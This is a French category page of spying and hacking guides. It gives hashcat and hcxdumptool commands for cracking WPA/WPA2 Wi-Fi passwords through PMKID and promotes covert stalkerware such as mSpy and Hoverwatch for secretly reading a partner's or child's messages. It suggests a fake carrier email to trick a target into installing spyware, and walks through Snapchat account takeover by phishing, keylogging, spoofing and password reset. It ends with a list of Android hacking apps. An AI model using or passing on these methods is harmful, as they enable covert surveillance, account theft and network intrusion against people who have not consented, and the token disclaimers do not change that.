Catégorie : Guides – Espionnage

Guides pour espionner un téléphone portable – Comment utiliser une application espion comme Mspy ou Hoverwatch pour surveiller un smartphone

Comment pirater facilement un mot de passe WiFi en utilisant une attaque WPA/WPA2

Vous cherchez comment pirater un mot de passe ? Un chercheur en sécurité a révélé une nouvelle technique de piratage WiFi qui permet aux pirates de cracker facilement les mots de passe WiFi de la plupart des routeurs modernes. Découverte par Jens Steube, le principal développeur du célèbre outil de piratage de mots de passe Hashcat, cette nouvelle technique de piratage WiFi prend pour cible le protocole de réseau sans fil WPA/WPA2 avec des fonctions d’itinérance.
L’attaque vise à compromettre les réseaux WiFi compatibles WPA/WPA2. Elle a été accidentellement découverte par Steube alors qu’il travaillait sur la nouvelle norme de sécurité WPA3.
En tant que nouvelle méthode de piratage WiFi, elle pourrait permettre à des attaquants de récupérer des mots de passe de connexion à clé pré-partagée (PSK), ce qui leur permettrait de pirater votre réseau Wi-Fi et d’écouter vos communications sur internet.

Comment pirater un mot de passe WiFi en utilisant PMKID

Jusqu’à présent, les méthodes de piratage du WiFi exigeaient que les attaquants attendent que quelqu’un se connecte à un réseau et capturent l’authentification complète lors du protocole d’authentification du port réseau. La nouvelle attaque ne nécessite pas qu’un utilisateur soit sur le réseau pour capturer ses identifiants. Elle est effectuée directement sur le RSNIE (Robust Security Network Information Element) en utilisant une seule trame EAPOL (Extensible Authentication Protocol Over LAN) après l’avoir demandée depuis le point d’accès. Le réseau Robust Security Network est un protocole permettant d’établir des communications sécurisées sur un réseau sans fil 802.11. La clé PMKID est nécessaire pour établir une connexion entre le client et son point d’accès.

1ère étape

L’ attaquant peut utiliser un outil comme hcxdumptool pour demander le PMKID au point d’accès ciblé et récupérer la trame dans un fichier.
$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable_status

2ème étape

En utilisant hcxpcaptool, il convertit la la sortie de la trame au format pcapng en un format de hachage accepté par Hashcat.
$ ./hcxpcaptool -z test.16800 test.pcapng

3ème étape

Ensuite il utilise l’outil de piratage de mot de passe Hashcat pour obtenir le mot de passe WPA PSK (Pre-Shared Key), et bingo, le mot de passe wifi est piraté.
$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘XXXXXXXXXXX’
XXXXXXXXXXX est le mot de passe du réseau sans fil ciblé. Notez que ce piratage peut prendre du temps en fonction de la longueur et de la complexité du mdp. On ne sait pas pour quels fournisseurs ni pour combien de routeurs cette technique fonctionnera, mais elle devrait fonctionner contre tous les réseaux 802.11i/p/q/r avec des fonctions d’itinérance activées (la plupart des routeurs modernes). Comme le nouveau piratage du WiFi ne fonctionne que contre les réseaux dont les fonctions d’itinérance sont activées et qu’il exige des attaquants qu’ils forcent le mot de passe, il est recommandé aux utilisateurs de protéger leur réseau WiFi avec un mot de passe sûr et difficile à craquer. Ce piratage WiFi ne fonctionne pas non plus contre le protocole de sécurité sans fil de nouvelle génération WPA3, car ce nouveau protocole est beaucoup plus difficile à attaquer en raison de son protocole moderne d’établissement de clés appelé “Simultaneous Authentication of Equals” (SAE)”.

Logiciels espions portables gratuits sans installation

Comment espionner des textos sur téléphone gratuitement et sans installer de logiciel ?

Nous avions déjà tenté de présenter un logiciel espion portable gratuit sans installation dans cet article, spécialement dans le domaine de la localisation à distance.

Mais aujourd’hui, en 2020, la tâche reste ardue en France pour parvenir à se procurer ce type de logiciel spécialement créé pour les smartphones, Android et iPhone. L’offre n’est pas légion, mais pourtant la demande est de plus en plus forte.

À quelle fréquence vos enfants utilisent-ils leur téléphone portable et à qui envoyent-ils des messages sur Instagram ?

Voulez-vous garder un oeil sur votre partenaire ou sur vos enfants adolescents ? Dans tous les cas, la loi vous oblige à obtenir son consentement écrit à moins de vivre dans certains pays ou d’être dans une situation exceptionnelle (voir nos mentions sur la légalité).

Pour de plus en plus de gens, espionner un iPhone ou un Android gratuitement et sans installation, c’est une question qui se pose.

Voici plusieurs façons d’espionner les messages sur iPhone et Android sans avoir le téléphone et sans installer de logiciel. Si vous souhaitez également espionner d’autres activités mobiles tels que les appels, les photos, les vidéos, les conversations WhatsApp, etc., cet article contient également de l’aide précieuse.

Espionner les SMS sans avoir d’iPhone grâce à iCloud

…alors la surveillance SMS devient très simple.

Une fois le périphérique connecté à un réseau Wi-Fi, Apple synchronise automatiquement les iMessages, SMS et MMS avec une sauvegarde iCloud. Tout ce dont vous avez besoin est un logiciel d’extraction de sauvegarde iCloud, comme par exemple cette liste établie par le site Wondershare.com.

Ces extracteurs de sauvegardes iCloud permettent généralement de télécharger toutes les données, y compris les messages de la sauvegarde iCloud, vers votre ordinateur local. C’est la raison pour laquelle on les compare à des logiciels espions portables gratuits sans installation.

  • Installez l’extracteur sur n’importe quel PC / Mac, et choisissez la section “Récupérer” depuis le fichier de sauvegarde iCloud.
  • Il ne vous reste ensuite qu’à vous connecter avec l’ID et le mot de passe du compte iCloud.

Espionner directement les messages sur iCloud

Une fois connecté à iCloud, toutes les sauvegardes sous l’identifiant Apple sont téléchargeables. Vous pouvez sélectionner une sauvegarde et commencer à numériser les données contenues dans celle-ci. Après numérisation, vous pouvez prévisualiser :

  • les messages,
  • les photos,
  • l’historique des appels,
  • les notes
  • les données Whatsapp
  • Tango
  • Viber

…sans aucune limitation. Le téléphone cible ne sera pas alerté de cette manoeuvre ! 

Se méfier des offres alléchantes sur internet

Lors de vos recherches, vous tomberez peut-être sur des offres qui paraissent alléchantes sur internet, affirmant pouvoir identifier tous les messages d’un Android ou d’un iPhone sans installation d’aucun logiciel et ceci gratuitement

Malheureusement, comme vous pouvez le voir dans les tests et commentaires de ces vidéos, ce n’est qu’un numéro de carte bleue qui risque d’apparaître lorsque vous rentrerez vos informations…

D’autres logiciels fonctionnent comme par exemple AirDroid dans cette vidéo, mais par contre ils affichent une icône et une notification sur le téléphone ciblé ce qui ne les rendent utiles que pour votre propre téléphone (dupliquer votre écran mobile sur l’écran de votre PC).

Et si je ne connais pas l’identifiant Apple de l’iPhone?

Si vous ne connaissez pas l’identifiant Apple de l’iPhone, le service “SMS-Peeper” est parfois utilisé pour récupérer les SMS du téléphone sans installer de logiciel.

Qu’est-ce que SMS-Peeper?

Il s’agit d’une technologie permettant aux parents de rester informés de l’activité de leurs enfants. Faire défiler les flux Instagram vous permet de découvrir quelles images vos enfants publient. Facebook vous informera également chaque fois que quelqu’un marque votre enfant sur une photo…

Mais SMS-Peeper ne s’occupe pour sa part que des SMS. Le service se connecte au smartphone de votre enfant et affiche tous les messages SMS envoyés et reçus. Le système d’espionnage peut afficher jusqu’à 100 textos récents : 50 textos envoyés et 50 autres reçus.

Les messages sont affichés avec les numéros de téléphone de l’expéditeur ou du destinataire, ainsi que d’autres informations comme l’horodatage. Vous pouvez lire l’intégralité du texte de chaque message.

Comment fonctionne SMS-peeper ?

Une personne dont vous lisez les messages avec SMS-Peeper ne pourra pas détecter le service.

Pour commencer à espionner les SMS, il faut vous rendre sur le site officiel. Pour activer le service, vous devez communiquer au site les informations suivantes :

  • votre pays
  • votre adresse e-mail
  • le numéro de téléphone de la personne dont vous souhaitez lire les messages.

Cliquez ensuite sur “récupérer les messages”. SMS-peeper commencera à intercepter les textes. Une fois l’interception terminée, vous pourrez commencer à recevoir les messages.

Après avoir testé le service, nous devons reconnaître qu’il ne fonctionne pas toujours. Je n’ai pas aimé non plus le fait que le site ne soit pas sécurisé (il n’est pas en https !) ; il est parfois détecté par le navigateur en tant que site potentiellement dangereux.

Dans certains cas, le site, faisant office de logiciel espion portable gratuit sans installation, ne capte pas les SMS ce qui en fait une solution plutôt aléatoire. Vous pouvez tester SMS-peeper, mais vous pouvez aussi essayer d’utiliser un autre logiciel, plus efficace que SMS-peeper :

Pourquoi mSpy est-il meilleur ?

Une alternative populaire réside dans l’application mSpy. Ce logiciel de contrôle parental, à installer sur le téléphone, offre de nombreuses fonctionnalités d’espionnage pour fournir une expérience de surveillance étendue. Voici quatre raisons pour commencer à utiliser mSpy maintenant:

  • 1/ Vous pouvez espionner les applications de messagerie. En espionnant les messages SMS de quelqu’un, vous mettez à jour de nombreux détails insoupçonnés. Tous les enfants ne communiquent pas par SMS. La majorité des jeunes préfèrent utiliser les réseaux sociaux pour discuter avec des amis et publier des photos.
  • 2/ Mspy donne un aperçu des comptes Facebook, Messenger, Instagram, Snapchat et Whatsapp de votre enfant. Le logiciel capte les données de n’importe quel compte régulièrement. Avec mSpy, vous pouvez lire les messages de votre enfant en secret et avoir accès aux discussions de groupe.
  • 3/ Vous pouvez recevoir les journaux de localisation. Mspy n’est pas seulement un logiciel de surveillance d’activité. L’application utilise le suivi de localisation GPS pour fournir une localisation en temps réel de votre enfant. Mspy enregistre les journaux de localisation et les stocke dans votre compte.
  • 4/ Mspy a la particularité de pratiquer le géofencing pour le périphérique ciblé. Le géofencing est une technologie qui vous alerte lorsque votre enfant entre ou quitte le territoire que vous avez préalablement établi.

Vous pouvez analyser des rapports détaillés : Mspy recueille les journaux d’activité et les stocke dans votre panneau de contrôle personnel. Le logiciel ne supprime pas les anciennes données. 

Il existe également une option pour recevoir des rapports complets, avec des données sur certains types d’activité. Mspy génère le rapport et l’envoie sur votre panneau de contrôle. En analysant les rapports réguliers, vous pouvez découvrir des détails importants et comprendre parfaitement l’activité du téléphone ciblé.

A noter
Si le téléphone ciblé est un iPhone, Mspy peut s’installer à distance simplement en rentrant les identifiants iCloud de l’appareil (choisir la version “sans jailbreak”).

Et pour Android ?

Comment espionner un Android sans l’avoir ?

Avec le système d’exploitation Android, l’installation à distance est plus compliquée.

Le but est de mettre en place le logiciel espion portable gratuit sans installation, sur le téléphone ciblé, sans pour autant le faire soi-même. Précisons que mSpy est parfaitement compatible sur les téléphones portables Android.

La solution est unique : envoyer le lien d’installation sur le téléphone ciblé pour que l’utilisateur l’installe lui-même !

Cela peut se faire en demandant au propriétaire de cliquer sur le lien d’installation. La tâche peut être délicate, mais c’est la seule façon possible de procéder. Certains utilisateurs vont jusqu’à envoyer un faux Email se faisant passer par le fournisseur téléphonique ou une fausse image qu’il faudrait cliquer. Le lien d’installation se cache derrière ! Une fois installé, le logiciel reste dans le périphérique ciblé.

Mise en garde

Certains logiciels espions se déguisent en fichiers conviviaux (pdf, etc.) qui peuvent être joints à un courriel ou un SMS. Le programme est configuré pour écouter les appels TCPIP entrants de votre appareil. Ils fonctionnent généralement comme un serveur ftp ou fournissent des fonctions d’amorçage pour l’installation de logiciels supplémentaires. Toutefois, vous devez savoir que de telles activités sont illégales et attireront l’attention des forces de sécurité du territoire sur lequel vous opérez. Ne le faîtes donc pas.

Utilisation de ces logiciels

Bien que vous n’ayez pas besoin d’autorisation pour espionner votre propre téléphone, il est toujours utile de noter que ces applications sont très utiles pour des utilisations légitimes et pour la protection des enfants. Mais elles ne sont pas utilisées pour surveiller les appareils des personnes à leur insu ou sans leur permission.

Un logiciel espion portable gratuit sans installation reste un outil et, pour certains, une véritable arme qui dépend de son utilisateur.

Les méthodes alternatives

Le Sniffing

Le “sniffing” consiste à capturer des informations qui circulent sur un réseau Wi-Fi.

Cela ressemble à une sorte d’espionnage de haut niveau que vous verriez dans un film d’espionnage, mais il existe de nombreux tutoriels auxquels vous pouvez accéder pour apprendre à craquer les mots de passe WiFi en quelques étapes élémentaires.

Il existe même des systèmes d’exploitation préconçus, comme l’O.S. Kali Linux, qui une fois mis en place peuvent vous permettre de “percer” un réseau sans fil. Une fois que vous avez accompli cela, vous avez accès au trafic qui passe par ces points. 

Des applications sur Android existent également pour craquer les réseaux wi-fi. Nous avons dressé ici la liste de ces applications

Pour se protéger :

Si les informations circulant sur ce réseau sans fil sont cryptées, il n’y a pas de risque majeur pour vous et vos informations d’être victimes de Sniffing.

L’un des meilleurs moyens de vous protéger contre ce type d’attaques est d’éviter les réseaux Wi-Fi publics. Les VPN sont également conçus pour justement chiffrer et protéger votre connexion.

Les caméras d’espionnage

Espionner un téléphone portable sans installer de logiciel espion n’est pas chose facile, mais à l’aide de caméras et d’autres équipements de surveillance, vous pouvez voler des mots de passe, des numéros de cartes de crédit et d’autres données sensibles.

Il suffit de s’assurer que la victime se trouve à l’endroit approprié lorsqu’elle tape des informations importantes sur son téléphone. De nos jours, les caméras d’espionnage sont petites, bon marché et très faciles à installer et à utiliser.

Il est également difficile de les remarquer, c’est pourquoi il est interdit de prendre en photo tout individu dans un lieu public. 

Comment pirater Snapchat – Guide 2020

Est-il possible de pirater un compte Snapchat?

Un jour, quelqu’un est venu me demander comment il pouvait pirater un de ses amis ; quand je lui ai demandé le nom de cet ami, il m’a sorti un pseudo qui ressemblait fortement au compte d’une célébrité… Cette personne voulait que je pirate le compte d’une célébrité simplement en lui envoyant par Email un lien frauduleux… Bien entendu ce n’est pas de cette manière qu’on peut s’y prendre. La norme, c’est d’utiliser une application pour pirater un compte Snapchat ; avoir le nom du compte n’a jamais suffi, et quiconque vous dira le contraire fera preuve de mauvaise foi. A ce sujet, attention aux sites d’arnaques vous demandant de composer un simple numéro de compte sur leur site : cela ne marche pas ! Mspy est l’une des meilleures applications qui vous permette de pirater tous les comptes populaires comme jamais il n’a été possible auparavant. Elle permet de :
Cette application vous permet d’espionner les messages Snapchat sans même en informer la personne. Il existe de nombreuses entreprises qui incitent leurs employés à utiliser Snapchat. Pour preuve l’empressement de cette société à recruter des informaticiens pour adapter l’application au sein des entreprises (ici le site officiel snap.com). Cet outil, il est vrai, vous permet de faire des choses très intéressantes et utiles, comme par exemple la promotion d’un produit, d’une photographie, la construction d’un réseau de clients et j’en passe.
→ Si vous pouvez obtenir les détails de tous les messages, Jetez un coup d’oeil à :
→ les vidéos, Notre test de l’application mSpy
→ et les images partagées ou reçues via Snapchat Ici la démonstration du soft

⇒ 3 failles de sécurité dans Snapchat

1⇒ On peut facilement pirater votre téléphone ou l’espionner afin de pouvoir ensuite pirater votre Snapchat. 2⇒ On peut aussi se rapprocher directement des serveurs Snapchat en utilisant l’ingénierie sociale (il s’agit de l’escroquerie qui utilise la faiblesse des personnes se trouvant derrière le support technique de Snapchat, pour obtenir vos mots de passe par la ruse). 3⇒ Il peut exister une faille dans une des mises à jour de l’application Snapchat elle-même. Quelle est la probabilité que ces failles se produisent ?
  • La première option est tout à fait envisageable. Il n’est pas très difficile d’installer un logiciel de type Keylogger dans votre smartphone et d’enregistrer les mots de passe et même les textes que vous écrivez. Il suffit pour cela de l’installer préalablement dans le téléphone.
  • La deuxième option s’est déjà produite dans d’autres entreprises, mais elle est difficile et nécessite beaucoup de pratiques. Je ne vais certainement pas faire ça pour avoir accès à un compte Snapchat. Cette solution est donc improbable bien que possible techniquement.
  • La dernière option dépend du professionnalisme des développeurs de Snapchat et de la qualité de leurs tests unitaires. Une faille informatique peut toujours se glisser dans un programme informatique, mais il est peu probable que les développeurs de Snapchat connaissent mal leur travail.

⇒ 3 manières différentes d’accèder aux informations d’un compte Snapchat

Qu’entend-on exactement par le mot piratage ?

En ce qui concerne Snapchat, lorsqu’une personne se connecte à votre compte avec votre nom d’utilisateur et votre mot de passe, ou lorsqu’elle accède à votre compte Snapchat personnel, on dit que votre compte est piraté.

Qui sont les pirates ?

Les pirates se cachent souvent derrière des visages familiers : peut-être quelqu’un avec qui vous vivez, éventuellement un ami, un membre de votre famille ou une personne complètement inconnue de vous.

Que font-ils précisément et comment s’y prennent-ils?

Les pirates essaient de voler ou d’accéder à vos informations de compte afin de nuire à votre vie privée, tout en dissimulant leur propre identité. Il n’y a aucun moyen de pirater votre compte Snapchat par la magie, comme voudraient nous le faire croire certains films. Ce que les pirates recherchent concrètement, c’est la façon de briser la sécurité de votre smartphone. Leur but est d’obtenir vos informations de connexion ou de lire directement le contenu de votre compte (toutes ses photos).

Voici quelques façons d’accéder aux informations de votre compte:

Il existe de nombreuses façons permettant à quelqu’un de pirater l’accès à une connexion non sécurisée. Peuvent être ciblés aussi bien des particuliers que des entreprises. Mais pour le commun des mortels, parvenir à accéder au code informatique de Snapchat et corrompre ses serveurs est difficilement faisable. La seule manière accessible de “pirater” le compte Snapchat de quelqu’un reste le vol de ses informations d’identification, par exemple:
  • L’ajout d’un keylogger au téléphone pour savoir tout ce qu’il tape au clavier,
  • L’envoi de courriels suspects (spam) pour vous forcer à taper votre mot de passe sur un faux site internet,
  • Appeler des numéros de téléphone aléatoire en se faisant passer pour un employé de Snapchat.
Le danger des enfants face aux prédateurs

⇒ Les 2 seules réponses officielles de Snapchat face au piratage

La réponse de Snapchat face au piratage informatique de ses identifiants de connexion se résume à cet article :
  • Changer votre mot de passe grâce à un lien qui vous sera envoyé sur votre messagerie Email (lien officiel)
  • Changer éventuellement votre Email (ici les explications officielles) et activer la double authentification par application (mode d’emploi ici, attention à ne pas perdre vos codes de secours car Snapchat ne fournit aucune aide en cas de perte des codes de secours).

Examinons maintenant les 5 champs des possibilités pour pirater un compte snap :

⇒ 1/ La méthode du phishing

La méthode du phising est la plus ancienne, la plus sûre et la plus facile pour pirater un compte Snapchat aussi bien sur mobile que sur ordinateur. Pour comprendre ce qu’est le phishing, regardez cette capture d’écran qui ressemble à la page de connexion de Snapchat… En réalité elle est fausse, puisque l’URL du lien contenu dans l’Email redirige vers un faux site. Ce site “malveillant” reproduit ce que l’on voit sur le site officiel, mais sur un nom de domaine différent. Il y a de fortes chances pour que le mot de passe, que vous devrez rentrer sur le site, soit copié et récupéré par la suite. Cette méthode ne demande qu’un simple copier-coller du site original sur un site dupliqué. Une fois que vous aurez rentré vos identifiants, ces derniers seront conservés par le webmestre, mais vous serez quand même redirigé vers le site officiel : il y a donc fort à parier que vous ne sachiez même pas que vous vous êtes fait hacker ! “Hameçonner” un site,  cela consiste à usurper son identité dans le but d’obtenir les renseignements de connexion d’une personne. Cependant, puisque Snapchat est une application mobile, hameçonner les informations de connexion de quelqu’un est très difficile. Vous avez besoin de beaucoup de savoir-faire technologique pour réussir et même dans ce cas, le succès n’est pas garanti. De plus, même si vous parvenez à hameçonner les détails de connexion de quelqu’un, vous ne pouvez pas voir les Snaps qu’il a envoyés et reçus dans le passé.

⇒ 2/ La méthode du keylogger (le meilleur moyen)

La méthode du Keylogger est très impressionnante pour pirater Snapchat. Fondamentalement, un keylogger est un logiciel spécial ou une application qui enregistre l’activité de l’utilisateur au clavier. Chaque alphabet, chaque chiffre est enregistré dans un fichier récupéré par l’espion. Ainsi, lorsque votre victime se connecte à son compte et qu’elle rentre ses identifiants, ceux-ci sont enregistrés, aussi bien le nom d’utilisateur que le mot de passe. Nous expliquons comment récupérer le mot de passe de la messagerie ciblée à l’aide d’y keylogger dans notre paragraphe “La méthode du mot de passe oublié” ci-dessous.
⇒ Pour Android / iPhone, je vous recommande d’utiliser Hoverwatch. Il va tout enregistrer, à partir du moment où vous avez préalablement installé le logiciel dans l’appareil. Il envoie ses résultats en ligne, ce qui le rend indétectable.
  • Pour l’utiliser, allez sur le site officiel et inscrivez-vous pour un nouveau compte. Il s’agit d’un keylogger payant, mais vous avez une garantie 100% remboursé durant 10 jours.
  • Après l’inscription, vérifiez votre compte de messagerie. Vous recevrez un mail de Hoverwatch contenant vos identifiants.
  • Ouvrez le lien contenu dans cet email, et connectez-vous à votre compte. Lorsque vous vous connectez, vous devrez choisir le système d’exploitation du téléphone.
  • Confirmez la page
  • Après cela, votre navigateur téléchargera un fichier d’installation de type lien.app
  • Enregistrez-le et installez-le dans le téléphone ciblé. L’installation est très simple. Elle vous demandera la clé de licence reçue dans votre boîte aux lettres.
  • Une fois l’installation terminée, vous commencez à recevoir les journaux en ligne. Je viens d’ouvrir mon compte WhatsApp et de taper quelques mots au hasard : ces mêmes mots frappés au clavier sont directement enregistrés dans mon compte Hoverwatch consultable en ligne !
Avec ce Keylogger, vous pouvez capturer non seulement Snapchat mais aussi d’autres applications comme Whatsapp, et même enregistrer les appels et les bruits ambiants autour du téléphone.

⇒ 3/ La méthode de l’ingénierie sociale

Les pirates ayant des compétences en ingénierie sociale font 50% du travail de hacking dans le monde, y compris pour Snapchat. Fondamentalement, l’ingénierie sociale consiste à comprendre le comportement de votre victime. Ce que je veux dire, c’est que pour de nombreux gars dans le monde, leur mot de passe se résume simplement au prénom de leur petite-amie… Il suffit juste de le connaître 🙂 L’ingénierie sociale ne consiste pas seulement à deviner le mot de passe. Par exemple, vous avez créé une page de phishing. Comment allez-vous indiquer à la victime de se connecter à son compte? Ici, l’ingénierie sociale joue un rôle : vous pouvez envoyer un message, proposer un objet gratuit en échange, etc. Autre exemple : Savez-vous qu’il est possible d’usurper les appels téléphoniques? Les numéros de téléphone ne sont que des nombres qu’il est possible d’emprunter pour vous faire passer pour le propriétaire. Il est même possible d’appeler quelqu’un par son propre numéro de téléphone ! Cette technique s’appelle “le spoofing”, elle fonctionne mais demeure payante et illégale dans de nombreux pays (voir cet article traitant du sujet dès 2013). Vous comprenez peut-être mieux ce qu’est la compétence en ingénierie sociale.

⇒ 4/ L’extraction du mot de passe enregistré

Se souvenir de son mot de passe n’est pas chose aisée. C’est pourquoi nous l’enregistrons couramment dans notre navigateur internet. La plupart des gens ignorent qu’on peut ensuite extraire le mot de passe Snapchat depuis cet endroit. Je vous présente ci-dessous mon tutoriel en utilisant le navigateur Google Chrome installé sur un PC. Voici les étapes à suivre:
Tutoriel extraction des mots de passe d’un navigateur:
  • Ouvrir les paramètres Google Chrome
  • Faites défiler vers le bas et appuyez sur Paramètres avancés
  • Faites défiler vers le bas et cliquez sur Gérer les mots de passe
  • Une alerte Windows apparaît, vous demandant de saisir votre mot de passe Windows afin d’accéder à la requête de Google Chrome
  • Le navigateur vous montre ensuite tous les mots de passe sauvegardés dans le navigateur. Cliquez sur le symbole de l’oeil pour voir le mot de passe en clair. Vous pouvez utiliser la zone de recherche pour filtrer le résultat.

⇒ 5/ La méthode du mot de passe oublié

Pirater une messagerie Email est parfois plus facile que le piratage de Snapchat. Pour le faire, un keylogger peut éventuellement être utilisé (voir le paragraphe précédent), à moins que vous ayiez tout simplement accès à la messagerie. Une fois la messagerie Email percée à jour, il suffit de se rendre sur la page de login Snapchat et de cliquer sur “mot de passe oublié“. Tapez le nom d’utilisateur puis réinitialisez le mot de passe par Email. Si un numéro de téléphone est rentré et la double authentification activée, un SMS de confirmation est envoyé sur le téléphone de la victime. Hoverwatch, comme dit précédemment, affiche les SMS reçus : vous pourrez ainsi facilement lire le nouveau mot de passe reçu ! (test complet de Hoverwatch ici) Pour tout autre keylogger suivez la marche à suivre :

Étape 1 : Réinitialisation du mot de passe par courrier électronique

Votre première étape consiste à réinitialiser le mot de passe de Snapchat par courriel. Pour réinitialiser le mot de passe de Snapchat, vous devez appuyer sur “Mot de passe oublié” sur l’écran de connexion. Vous avez 2 choix : soit le réinitialiser par email ou par SMS. Choisissez le premier pour continuer. Vous recevrez alors un lien de réinitialisation du mot de passe sur l’email connecté au compte Snapchat.

Étape 2 : Pirater Gmail, Yahoo ou tout autre compte de messagerie avec le Keylogger

Votre prochaine étape consiste à pirater Gmail ou tout autre compte de messagerie associé au profil Snapchat. Vous pouvez soit réinitialiser le mot de passe à partir de la messagerie si vous y avez accès, soit utiliser l’application d’enregistrement de frappe. L’application keylogger peut capturer les identifiants de connexion Gmail ou Yahoo pour vous. Ensuite, vous pouvez vous connecter et rechercher le lien de réinitialisation de Snapchat dans la boîte de réception. Suivez le lien et créez un nouveau mot de passe Snapchat. Avec les nouveaux identifiants de connexion, vous pourrez entrer dans le compte sans restriction.

Existe-t-il d’autres moyens gratuits pour pirater Snapchat ?

Si vous faîtes une petite recherche en ligne, vous verrez un certain nombre d’outils de piratage Snapchat qui, à première vue, semblent très bien. La plupart sont annoncés comme étant du piratage Snapchat gratuit, ce qui en soi me donne vite envie de tirer la sonnette d’alarme. Ces “outils” sont partout, mais regardez bien les sites web sur lesquels ils se trouvent – vous pensez qu’ils ont l’air professionnels ? La plupart d’entre eux sont présentés sur internet sous la forme de vidéos. Comme le disent les commentaires sur Youtube, ces méthodes online ne fonctionnent pas.

Exemple de leurre qu’on peut trouver sur Youtube :

Les commentaires de cette arnaque sur Youtube sont éloquents :

Ces “outils” sont des faux et ne sont configurés que pour vous faire cliquer sur des publicités, ajouter votre email ou répondre à une enquête. Ils rapportent de l’argent à leurs propriétaires… mais vous ne pourrez rien voir de Snapchat. La plupart commencent par vous demander de saisir le nom d’utilisateur Snapchat que vous voulez pirater. Connaissez-vous le nom d’utilisateur de votre enfant ? Probablement pas. Est-ce qu’il n’a qu’un seul compte? Est-ce qu’il vous dit la vérité ? Vous voyez déjà les problèmes arriver ? L’utilisation d’un logiciel d’espionnage de téléphone cellulaire offre le meilleur moyen d’espionner un compte Snapchat et de gérer ses activités. Utiliser l’une des applications d’espionnage recommandées vous donnera la méthode la plus complète vous permettant de voir les nouveaux statuts et les communications.

Bibliographie

12 applications de hacker pour pirater depuis un Android (APK gratuits)

Android est le système d’exploitation le plus populaire au monde et sa base d’utilisateurs se compose de nombreux amateurs de piratage éthique. Cet état de fait a inspiré différents développeurs à créer des applications de hacker à utiliser depuis un Android. Pour aider nos lecteurs à effectuer des tests de pénétration et des analyses scientifiques sur leur téléphone Android, nous avons établi une liste des meilleurs outils gratuits pour 2020 que l’on peut utiliser sur des appareils rootés ou non. Notre liste comprend des applications populaires de piratage Wi-Fi comme Hackode, zANTI, Shark for Root, etc. Vous pouvez trouver la liste des applications dans le tableau ci-dessous.
Applications de piratage pour Android rootés et non-rootés
Fing
Kali Linux Nethunter
Wi-Fi Kill
SshDroid
Nmap
DroidBox
DroidSheep
Shark for Root
FaceNiff
zAntI
Hackode
AndroRAT
Plus bas dans l’article, j’ai mentionné les avantages et les inconvénients de ces applications de hack selon ma propre expérience et les évaluations du secteur. J’ai également fourni des liens de téléchargement pertinents pour vous aider à démarrer en un rien de temps. Si vous recherchez des outils similaires pour pirater un réseau wi-fi, consultez notre liste dédiée. Nous ne publions cette liste qu’à des fins éducatives et ne plébliscitons pas le piratage non-éthique.

12 meilleures applications de hacking pour téléphones Android

Kali Linux NetHunter

Kali Linux NetHunter est la première plateforme de test de pénétration open source pour les appareils Nexus fonctionnant sous Android et OnePlus One. Elle prend en charge l’injection de trames sans fil 802.11, le clavier HID, la configuration de points d’accès malveillants MANA, les attaques BadUSB MITM, etc. Lien de téléchargement de Kali Linux NetHunter

Fing Network Scanner

Cette application populaire de scanner de réseau pour Android est utilisée par les hackers et les professionnels de la sécurité pour:
  • repérer les téléphones ou ordinateurs reliés à internet,
  • dresser une carte de ces appareils dans l’espace,
  • identifier quels sont les risques pour la sécurité,
  • découvrir les intrus,
  • trouver une solution aux problèmes réseau.
Elle est fournie avec plus d’une 12aine d’outils réseau gratuits pour vous faciliter la tâche. Lien de téléchargement Fing

SSHDroid

SSHDroid est une implémentation de serveur SSH pour Android. Cette application vous permettra de vous connecter à votre appareil depuis un PC, d’exécuter des commandes (comme “terminal” et “adb shell”) et de modifier des fichiers (par SFTP, WinSCP, Cyberduck, etc…). Le rootage de l’Android est facultatif pour exécuter cette application mais seulement recommandé. Téléchargement de cette application de hacking ici

Wi-Fi Kill

WifiKill est une bonne application de contrôleur Wifi pour tout appareil Android. Elle peut couper les connexions internet de n’importe quel réseau wifi. Supposons que vous soyez connecté à un réseau wifi partagé. La vitesse du réseau est trop mauvaise. Dans ce cas, WifiKill vous aidera à gagner de la vitesse en coupant ou en bloquant d’autres connexions. Vous pouvez également surveiller l’utilisation des données de l’appareil connecté. Il existe de nombreuses versions de WifiKill Pro APK disponibles sur le web. Parmi elles, WifiKill PRO 2.3.2 APK est la dernière version. C’est la seule version stable après Wifikill APK 1.7. Le téléchargement complet et gratuit de WifiKill APK est disponible via le lien plus bas. WIfiKill est l’application de hacker développée par le développeur de l’application XDA “bponury”. C’est une excellente application pour réduire les abus de bande passante. Téléchargement de l’application Wi-Fi kill

DroidBox

DroidBox est développé pour offrir une analyse dynamique des applications Android. Les informations suivantes sont décrites dans les résultats, générés lorsque l’analyse est terminée :
  • Hash pour le paquet analysé
  • Données de réseau entrantes/sortantes
  • Opérations de lecture et d’écriture de fichiers
  • Lancement de services
  • Chargement des classes
  • Fuites d’informations via le réseau, les fichiers et les SMS
  • Autorisations contournées
  • Opérations cryptographiques effectuées à l’aide de l’API Android
  • Liste des récepteurs de radiodiffusion
  • Envoi de SMS et appels téléphoniques
Téléchargement de cette application gratuite de piratage téléphonique

Nmap

Nmap est l’un des cartographes de réseaux les plus populaires du monde de l’infosec. Il est utilisé par les professionnels de la cybersécurité et les novices pour auditer et découvrir les ports ouverts locaux et distants, ainsi que les hôtes et les informations réseau. Parmi les meilleures caractéristiques de l’outil Nmap, on peut citer le fait qu’il est open-source, gratuit, multi-plateformes et qu’il reçoit des mises à jour régulières chaque année. Il a aussi un gros avantage : c’est l’un des scanners d’hôte et de réseau les plus complets du marché. Il comprend un grand nombre d’options pour améliorer vos tâches de numérisation et de cartographie, et rassemble derière lui une incroyable communauté et une documentation complète pour hacker Androids et réseaux.

Nmap peut être utilisé pour :

  • Créer une carte complète du réseau informatique.
  • Trouver les adresses IP distantes de n’importe quel hôte.
  • Obtenir les détails du système d’exploitation et des logiciels.
  • Détecter les ports ouverts sur les systèmes locaux et distants.
  • Auditer les normes de sécurité des serveurs.
  • Trouver les vulnérabilités sur les hôtes locaux et distants.

Les 15 meilleurs exemples de commandes Nmap :

  • 1. Balayage de la carte Nmap par rapport à l’IP ou à l’hôte
  • 2. Scanner des ports spécifiques ou scanner des plages de ports entières sur un serveur local ou distant
  • 3. Scanner plusieurs adresses IP
  • 4. Scanner les plages d’IP
  • 5. Scanner les ports les plus populaires
  • 6. Analyser les hôtes et les adresses IP lues dans un fichier texte
  • 7. Enregistrez les résultats de votre scan Nmap dans un fichier
  • 8. Désactivation de la résolution des noms de DNS
  • 9. Scan et détection de service avec exécution rapide
  • 10. Détecter les versions service / démon
